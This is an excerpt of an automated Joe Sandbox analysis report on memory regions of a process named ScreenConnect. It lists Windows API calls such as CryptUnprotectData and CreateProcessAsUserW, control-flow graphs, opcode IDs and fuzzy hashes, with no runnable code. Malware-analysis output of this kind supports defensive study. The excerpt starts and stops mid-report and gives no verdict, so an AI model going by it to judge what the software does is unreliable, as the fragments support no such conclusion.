                                                                                                                            • Instruction Fuzzy Hash: 3961CE71A003089FDB14DFA9D844BAEBBF6BF88310F14806AE509EB291D774A945CB61

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 853 1f74c6e-1f74cb3 858 1f74cb5-1f74cc4 call 1f74848 853->858 859 1f74d02-1f74d08 853->859 862 1f74cc6-1f74ccb 858->862 863 1f74d09-1f74dd8 RtlGetVersion 858->863 875 1f74cce call 1f752f8 862->875 876 1f74cce call 1f752e8 862->876 868 1f74de1-1f74e24 863->868 869 1f74dda-1f74de0 863->869 864 1f74cd4 864->859 873 1f74e26 868->873 874 1f74e2b-1f74e32 868->874 869->868 873->874 875->864 876->864
                                                                                                                            APIs
                                                                                                                            • RtlGetVersion.NTDLL(0000009C), ref: 01F74DBE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3572175888.0000000001F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1f70000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Version
                                                                                                                            • String ID: `Q^q$`Q^q
                                                                                                                            • API String ID: 1889659487-4048626156
                                                                                                                            • Opcode ID: 8bc43b8c9b87623e73c24938f6d113c361ba967865489e845bcec779d0674697
                                                                                                                            • Instruction ID: cb0b1ce5c1bfead9650762e14c3160f563c31677a61d2faf2a97204f33c477f3
                                                                                                                            • Opcode Fuzzy Hash: 8bc43b8c9b87623e73c24938f6d113c361ba967865489e845bcec779d0674697
                                                                                                                            • Instruction Fuzzy Hash: 0541B071E00319DFDB20DF68C81879EBBB5FB45310F1085EAD548A7240DB755A89CF92
                                                                                                                            APIs
                                                                                                                            • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05EA030F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2217836671-0
                                                                                                                            • Opcode ID: b1ecf2416f643eafc64d2062e42dd3c021d75cab361a52808af603f0539ea0eb
                                                                                                                            • Instruction ID: 93c10761db9d4a4b5a2811137d35e1a31b244b71ba1dfb9b7eb08c873976571b
                                                                                                                            • Opcode Fuzzy Hash: b1ecf2416f643eafc64d2062e42dd3c021d75cab361a52808af603f0539ea0eb
                                                                                                                            • Instruction Fuzzy Hash: 5541127290020ADFDB10CFA9C884ADEBBF1FF48310F14852AE958AB250D735A955CFA0
                                                                                                                            APIs
                                                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 063A42BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3597378854.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_63a0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 834300711-0
                                                                                                                            • Opcode ID: 90025121baee2318629cbcf164dcb83b84de747a7ac6c6f5504e21c196270ca0
                                                                                                                            • Instruction ID: 22a10cac00da8906fa4cdfa84b6786772fc82f53436e808dacc39681d4cb7857
                                                                                                                            • Opcode Fuzzy Hash: 90025121baee2318629cbcf164dcb83b84de747a7ac6c6f5504e21c196270ca0
                                                                                                                            • Instruction Fuzzy Hash: AA2157758003499FCB10CF99C844ADEBFF5EF48320F148459E954A7251C375A555DFA1
                                                                                                                            APIs
                                                                                                                            • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 046617AE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3588658088.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4660000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptDataProtect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3091777813-0
                                                                                                                            • Opcode ID: eab10e411bc584b8b35ebda5a65e990e2ca2d52e29b9854dc3f529d62cb87750
                                                                                                                            • Instruction ID: 9886659fb4ebe56ee4c448ad532083265f2ae3d0c4fb5eac2136eeb30db30537
                                                                                                                            • Opcode Fuzzy Hash: eab10e411bc584b8b35ebda5a65e990e2ca2d52e29b9854dc3f529d62cb87750
                                                                                                                            • Instruction Fuzzy Hash: B02137B680024ADFDF10CF99C844ADEBBF1FF88320F148529E965A7251D339A555CFA1
                                                                                                                            APIs
                                                                                                                            • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 046617AE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3588658088.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4660000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptDataProtect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3091777813-0
                                                                                                                            • Opcode ID: 1061ca5fe5c15f3bebe1f866e642de0f694b54134cb17996041be116f332a05a
                                                                                                                            • Instruction ID: d67e98b55f21aa103ddf74f21a7c18f91dea2b8343924455db10c35b0c116973
                                                                                                                            • Opcode Fuzzy Hash: 1061ca5fe5c15f3bebe1f866e642de0f694b54134cb17996041be116f332a05a
                                                                                                                            • Instruction Fuzzy Hash: 892104B680024A9FDB10CF9AC844ADEBBF5FB88320F148529E919A7210D739A555CFA1
                                                                                                                            APIs
                                                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 063A42BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3597378854.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_63a0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 834300711-0
                                                                                                                            • Opcode ID: ae789d437048b2ad5924aec57ad120508693a968b3155395037c3ecddbfec796
                                                                                                                            • Instruction ID: 0258fb8eb0724a437c50b9feb40057bfa797296713e31093bedf3d788550e306
                                                                                                                            • Opcode Fuzzy Hash: ae789d437048b2ad5924aec57ad120508693a968b3155395037c3ecddbfec796
                                                                                                                            • Instruction Fuzzy Hash: A22144B680024ADFDB10CF99C845BDEBBF4EF48320F108419E915A7251C339A595DFA5
                                                                                                                            APIs
                                                                                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 063A42BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3597378854.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_63a0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 834300711-0
                                                                                                                            • Opcode ID: f2f26be0b80070b31c4b1f2df74b540ffeb209e952b6d0a7c5d60832ca1e850e
                                                                                                                            • Instruction ID: 417a14965a7159ff93a3a58f0826465a365e82ad91ad57d41e7666b12df91dbb
                                                                                                                            • Opcode Fuzzy Hash: f2f26be0b80070b31c4b1f2df74b540ffeb209e952b6d0a7c5d60832ca1e850e
                                                                                                                            • Instruction Fuzzy Hash: 9C214776800249DFDB10CF99C845BEEBBF4EF48320F108419E914A7211D379A555DFA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5c83998d6a4c76b39a1f60f242832ab1c8dcb608be8f1e1ca14692cc508512cf
                                                                                                                            • Instruction ID: 2c0efd1976651bc9b5a713ebf54df2375e13e7ee4f7a20c709621e1d5862efb7
                                                                                                                            • Opcode Fuzzy Hash: 5c83998d6a4c76b39a1f60f242832ab1c8dcb608be8f1e1ca14692cc508512cf
                                                                                                                            • Instruction Fuzzy Hash: 8B524E70E002198FDB24DF25C854BADB7B2FF89704F1485A9D94AEB250EB70AD85CF91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 675 582b957-582b9d7 679 582ba05-582ba21 675->679 680 582b9d9-582b9fd 675->680 681 582ba53-582ba83 call 582b450 call 582b188 679->681 682 582ba23-582ba50 679->682 680->679 693 582ba85-582ba8d 681->693 694 582ba8f-582ba9f 681->694 682->681 695 582baea-582bb0b 693->695 696 582bad2-582badc 694->696 697 582baa1-582bacf 694->697 698 582bb11-582bb30 call 582b110 695->698 699 582bdb7-582bdbf 695->699 703 582bae4 696->703 697->696 698->699 705 582bb36-582bb65 call 582b110 698->705 701 582bdc4-582be12 699->701 726 582be96-582beab 701->726 727 582be18-582be3b 701->727 703->695 712 582bb76-582bb9c 705->712 713 582bb67-582bb71 705->713 714 582bbe6-582bc1e 712->714 715 582bb9e-582bbe0 712->715 713->701 720 582bc20-582bc43 714->720 721 582bc48-582bc70 714->721 715->714 722 582bd81-582bdb5 720->722 730 582bc72-582bc95 721->730 731 582bc9a-582bcc3 721->731 722->701 734 582c231-582c26a 726->734 728 582be4f-582be5d 727->728 729 582be3d-582be4d 727->729 739 582be85-582be94 728->739 729->728 738 582be5f-582be6d 729->738 730->722 731->734 740 582bcc9-582bcda 731->740 747 582c2a4-582c2df 734->747 748 582c26c-582c280 734->748 738->739 749 582be6f-582be7d 738->749 739->726 739->727 740->734 742 582bce0-582bcf1 740->742 742->734 745 582bcf7-582bd08 742->745 745->734 750 582bd0e-582bd1f 745->750 762 582c2e1-582c2f5 747->762 763 582c31d-582c333 747->763 754 582c282 748->754 755 582c289-582c299 748->755 749->739 750->734 751 582bd25-582bd7e 750->751 751->722 754->755 755->747 766 582c2f7 762->766 767 582c2fe-582c31b 762->767 816 582c336 call 582c693 763->816 817 582c336 call 582c6a0 763->817 766->767 767->763 770 582c33c-582c33e 772 582c344-582c36e 770->772 773 582c4e5-582c4fe 770->773 781 582c472-582c47e 772->781 782 582c374-582c384 772->782 775 582c500 773->775 776 582c509 773->776 775->776 778 582c50a 776->778 778->778 787 582c480 781->787 788 582c48a-582c4af 781->788 785 582c386-582c388 782->785 786 582c38a-582c3a3 782->786 789 582c3d4-582c3d6 785->789 799 582c3a5 786->799 800 582c3ac-582c3d1 786->800 787->788 791 582c4d4-582c4df 788->791 794 582c4b1-582c4cd 788->794 789->791 792 582c3dc-582c447 789->792 791->772 791->773 792->791 812 582c44d-582c470 792->812 794->791 799->800 800->789 812->791 816->770 817->770
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CN)m^$K"$k"$M)m^
                                                                                                                            • API String ID: 0-857984853
                                                                                                                            • Opcode ID: 03da0e32ce25727e37206dea13dde68fda5585a3677b63d8df59e206814f9b74
                                                                                                                            • Instruction ID: 3f309aec6e1516fe34ca8167c73ca44e718ac49a0b3ea9e4c1dc719bf2e34258
                                                                                                                            • Opcode Fuzzy Hash: 03da0e32ce25727e37206dea13dde68fda5585a3677b63d8df59e206814f9b74
                                                                                                                            • Instruction Fuzzy Hash: 7D225074A002299FDB64DF64C844BADBBB2FF48304F1085A9D909E7354EB71AD86CF91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 877 582c248-582c26a 878 582c2a4-582c2df 877->878 879 582c26c-582c280 877->879 888 582c2e1-582c2f5 878->888 889 582c31d-582c333 878->889 882 582c282 879->882 883 582c289-582c299 879->883 882->883 883->878 892 582c2f7 888->892 893 582c2fe-582c31b 888->893 942 582c336 call 582c693 889->942 943 582c336 call 582c6a0 889->943 892->893 893->889 896 582c33c-582c33e 898 582c344-582c36e 896->898 899 582c4e5-582c4fe 896->899 907 582c472-582c47e 898->907 908 582c374-582c384 898->908 901 582c500 899->901 902 582c509 899->902 901->902 904 582c50a 902->904 904->904 913 582c480 907->913 914 582c48a-582c4af 907->914 911 582c386-582c388 908->911 912 582c38a-582c3a3 908->912 915 582c3d4-582c3d6 911->915 925 582c3a5 912->925 926 582c3ac-582c3d1 912->926 913->914 917 582c4d4-582c4df 914->917 920 582c4b1-582c4cd 914->920 915->917 918 582c3dc-582c447 915->918 917->898 917->899 918->917 938 582c44d-582c470 918->938 920->917 925->926 926->915 938->917 942->896 943->896
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #N)m^$CN)m^$M)m^
                                                                                                                            • API String ID: 0-1381968222
                                                                                                                            • Opcode ID: 679d5a2e99cc1faca2124ab998f82ebdc833ba26fa70970ff7259f0142059bed
                                                                                                                            • Instruction ID: b94578a904338bc9263f244a00c1c71128c0704dedeb16f411ba9fbf1f81f6b4
                                                                                                                            • Opcode Fuzzy Hash: 679d5a2e99cc1faca2124ab998f82ebdc833ba26fa70970ff7259f0142059bed
                                                                                                                            • Instruction Fuzzy Hash: B3718F30A002159BC718EB79D89457EBFB2FF84314B54882CD906DB354EF75ED8A8B91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 944 5ea06f0-5ea245c 946 5ea245e-5ea2483 944->946 947 5ea24b0-5ea2533 CreateFileA 944->947 946->947 950 5ea2485-5ea2487 946->950 954 5ea253c-5ea257a 947->954 955 5ea2535-5ea253b 947->955 952 5ea24aa-5ea24ad 950->952 953 5ea2489-5ea2493 950->953 952->947 956 5ea2497-5ea24a6 953->956 957 5ea2495 953->957 962 5ea258a 954->962 963 5ea257c-5ea2580 954->963 955->954 956->956 958 5ea24a8 956->958 957->956 958->952 965 5ea258b 962->965 963->962 964 5ea2582 963->964 964->962 965->965
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05EA251D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID: 4L^q
                                                                                                                            • API String ID: 823142352-616035646
                                                                                                                            • Opcode ID: ff7b38231036caf61800e8be6c9bb4971a8cd4ff4533c025c85859389db008ab
                                                                                                                            • Instruction ID: ff71c9b38ed20ce49a0994e9889b59ccc996f57dd799d3b2267844515ba2dc06
                                                                                                                            • Opcode Fuzzy Hash: ff7b38231036caf61800e8be6c9bb4971a8cd4ff4533c025c85859389db008ab
                                                                                                                            • Instruction Fuzzy Hash: 5F5156B5D003599FDB10CFA9C844B9EBBF2FB48304F248129E948AB355D775A845CF91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 966 5ea23f4-5ea245c 969 5ea245e-5ea2483 966->969 970 5ea24b0-5ea2533 CreateFileA 966->970 969->970 973 5ea2485-5ea2487 969->973 977 5ea253c-5ea257a 970->977 978 5ea2535-5ea253b 970->978 975 5ea24aa-5ea24ad 973->975 976 5ea2489-5ea2493 973->976 975->970 979 5ea2497-5ea24a6 976->979 980 5ea2495 976->980 985 5ea258a 977->985 986 5ea257c-5ea2580 977->986 978->977 979->979 981 5ea24a8 979->981 980->979 981->975 988 5ea258b 985->988 986->985 987 5ea2582 986->987 987->985 988->988
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05EA251D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID: 4L^q
                                                                                                                            • API String ID: 823142352-616035646
                                                                                                                            • Opcode ID: 147f2ff3d5954f3b3891aa572c484e039c00fcbf68932e56a338e6d985c5858a
                                                                                                                            • Instruction ID: 200ef5e0324e6b8d1bd16fd3c79b2d05356c6563da1036288f270a4ddd4c5fcd
                                                                                                                            • Opcode Fuzzy Hash: 147f2ff3d5954f3b3891aa572c484e039c00fcbf68932e56a338e6d985c5858a
                                                                                                                            • Instruction Fuzzy Hash: 1B5177B5D003499FDB10CFA9C884B9EBBF2BB48314F248129E848AB391D7759881CF81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: fcq$ fcq
                                                                                                                            • API String ID: 0-3114753931
                                                                                                                            • Opcode ID: 1fd7c0a35c9eaee2be3046ff6b933e1a493077566f6b7626722a31119a394e9e
                                                                                                                            • Instruction ID: 2f6fd0acf32a63f7690d44b8313b389b51193f66f885529545af4d238762a963
                                                                                                                            • Opcode Fuzzy Hash: 1fd7c0a35c9eaee2be3046ff6b933e1a493077566f6b7626722a31119a394e9e
                                                                                                                            • Instruction Fuzzy Hash: 1871B231F002199BCB05DFA5D8416AEBBF2FF85704F14856AD905EB381EE719D8ACB81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,$m
                                                                                                                            • API String ID: 0-217946837
                                                                                                                            • Opcode ID: f2cfe7b00b1d6884a3dc2463bbd9f6358977bb28b016623198f392537b12cbd4
                                                                                                                            • Instruction ID: 42d960bffb64296eaee8292838e6b4abbe26331f17ba565c916d7f060e9e6a73
                                                                                                                            • Opcode Fuzzy Hash: f2cfe7b00b1d6884a3dc2463bbd9f6358977bb28b016623198f392537b12cbd4
                                                                                                                            • Instruction Fuzzy Hash: 30512C766093904FCB02AF3898642D97F71EF57214F1541EBC881DB293EA349D4ACBA2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: +Cg$Eg
                                                                                                                            • API String ID: 0-2375101039
                                                                                                                            • Opcode ID: ad08ec168888b13b2002d507f4e0e1884482bbd366678549bcdaef3648ffa593
                                                                                                                            • Instruction ID: b62d11f7e8ae623f0c48723c3c20c123aedc57c2222bb273051897449d690adb
                                                                                                                            • Opcode Fuzzy Hash: ad08ec168888b13b2002d507f4e0e1884482bbd366678549bcdaef3648ffa593
                                                                                                                            • Instruction Fuzzy Hash: 2351F678A00214CFDB54DF28C494A99BBF2EF89314F148099E94AEB361DB31ED85CF51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: +Cg$Eg
                                                                                                                            • API String ID: 0-2375101039
                                                                                                                            • Opcode ID: 2d4bca66e543e283365af3d3dfe1408e308a8ada5d16f8ee8bb9906c51ff21ab
                                                                                                                            • Instruction ID: 170ea74af24068ad4b3441b9d388d56b458fcb55adc412a9881cfbe073792bfa
                                                                                                                            • Opcode Fuzzy Hash: 2d4bca66e543e283365af3d3dfe1408e308a8ada5d16f8ee8bb9906c51ff21ab
                                                                                                                            • Instruction Fuzzy Hash: 60412678A00214CFCB54DF68C894A99BBB2FF89314F1480A9D949EB361DB31ED82CF51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: +Cg$Eg
                                                                                                                            • API String ID: 0-2375101039
                                                                                                                            • Opcode ID: ef5f1a5cee57af90589ebe6b1e0248ed22b4b103075a916d4e01d1d8bc9248b6
                                                                                                                            • Instruction ID: d0628fc8dc2e61fbeb3807154efa3314ffda024a15d3a5e5e3b67108b4558563
                                                                                                                            • Opcode Fuzzy Hash: ef5f1a5cee57af90589ebe6b1e0248ed22b4b103075a916d4e01d1d8bc9248b6
                                                                                                                            • Instruction Fuzzy Hash: B8411578A00214CFDB14DF68C494B99BBF2EF89314F148099E94AEB361DB71ED86CB51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0u
                                                                                                                            • API String ID: 0-3203441087
                                                                                                                            • Opcode ID: f048d7254da75a515409f550284540273e7961d1ba7f5bc5744b989d91a157ca
                                                                                                                            • Instruction ID: 3d1118dcff50dde88387fc0a620b6527aeba11dfb4b7d06ab0b5e0713aac24f2
                                                                                                                            • Opcode Fuzzy Hash: f048d7254da75a515409f550284540273e7961d1ba7f5bc5744b989d91a157ca
                                                                                                                            • Instruction Fuzzy Hash: D2426E74A00619CFDB54EF68D854A9DBBB2FF88300F1085D9E909AB365DB31AD85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3597378854.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_63a0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e55ea5659152249cbe27e5250ed51045c5d4b474cb6ad8ddd723f7fe4713ce95
                                                                                                                            • Instruction ID: 425cafc28a21eb52d1e5c39d0ac66e9916e018ac65e6bc4cf5db8765c9402418
                                                                                                                            • Opcode Fuzzy Hash: e55ea5659152249cbe27e5250ed51045c5d4b474cb6ad8ddd723f7fe4713ce95
                                                                                                                            • Instruction Fuzzy Hash: BD519F75A007058FCB24CFA9D8846AEFBF5EF88310F10892DE469D7651D734E945CBA1
                                                                                                                            APIs
                                                                                                                            • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05EA030F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2217836671-0
                                                                                                                            • Opcode ID: 825a383365b6b35306ed1998dc7c3f47d3bd70b053cd06567b0b12610301ece3
                                                                                                                            • Instruction ID: 8cf0b7227c5e3770a918ce9c9d2138ff2d36febb175338acd7efd6d75be294fc
                                                                                                                            • Opcode Fuzzy Hash: 825a383365b6b35306ed1998dc7c3f47d3bd70b053cd06567b0b12610301ece3
                                                                                                                            • Instruction Fuzzy Hash: C7413376900209DFDB10CFA9C884ADEBBF1FF48320F14852AE958AB250D734A955CF50
                                                                                                                            APIs
                                                                                                                            • ConnectNamedPipe.KERNEL32(00000000), ref: 05EA1EE8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConnectNamedPipe
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2191148154-0
                                                                                                                            • Opcode ID: e7b65116d0b2cdd810cb9315838aa8b5b4dd05b3ae7d2ca97c4a07d3bdfffde3
                                                                                                                            • Instruction ID: ae8280cf38eaef04865cf53724a85350bd41cfa6c9060e070b55f3227ad04aed
                                                                                                                            • Opcode Fuzzy Hash: e7b65116d0b2cdd810cb9315838aa8b5b4dd05b3ae7d2ca97c4a07d3bdfffde3
                                                                                                                            • Instruction Fuzzy Hash: A22128B1D042589FCB18CFAAC484BDDBBF5AF48314F148069E859AB350DB74A941CF94
                                                                                                                            APIs
                                                                                                                            • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 063A735D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3597378854.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_63a0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumProcesses
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 84517404-0
                                                                                                                            • Opcode ID: ddd79df1af691a21d53f27626d45918767a68d4f519879bba46489957744c259
                                                                                                                            • Instruction ID: 7ee6c9fe5db3c4e6ca9a2d8719046068a95418c2c5ae1d012e5bf4ba5fd4f604
                                                                                                                            • Opcode Fuzzy Hash: ddd79df1af691a21d53f27626d45918767a68d4f519879bba46489957744c259
                                                                                                                            • Instruction Fuzzy Hash: C82114B59003099FDB10CF9AC885ADEBBF4EB48320F54852EE958A7240D378A945CBA4
                                                                                                                            APIs
                                                                                                                            • ConnectNamedPipe.KERNEL32(00000000), ref: 05EA1EE8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConnectNamedPipe
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2191148154-0
                                                                                                                            • Opcode ID: a52fbc9614654953c5d92c2e04ea749d4c58da9d5345e902ad1448defbcc7bd9
                                                                                                                            • Instruction ID: 47659ad9d2168afd40388c33e74744122b57b6441ac32b38e2a78e8dbc5027a7
                                                                                                                            • Opcode Fuzzy Hash: a52fbc9614654953c5d92c2e04ea749d4c58da9d5345e902ad1448defbcc7bd9
                                                                                                                            • Instruction Fuzzy Hash: D42117B1D04258DFCB14CFAAC484BDEBBF5AF48314F148069E859AB350DB74A945CF94
                                                                                                                            APIs
                                                                                                                            • WaitNamedPipeW.KERNEL32(00000000), ref: 05EA22EF
                                                                                                                            Memory Dump Source
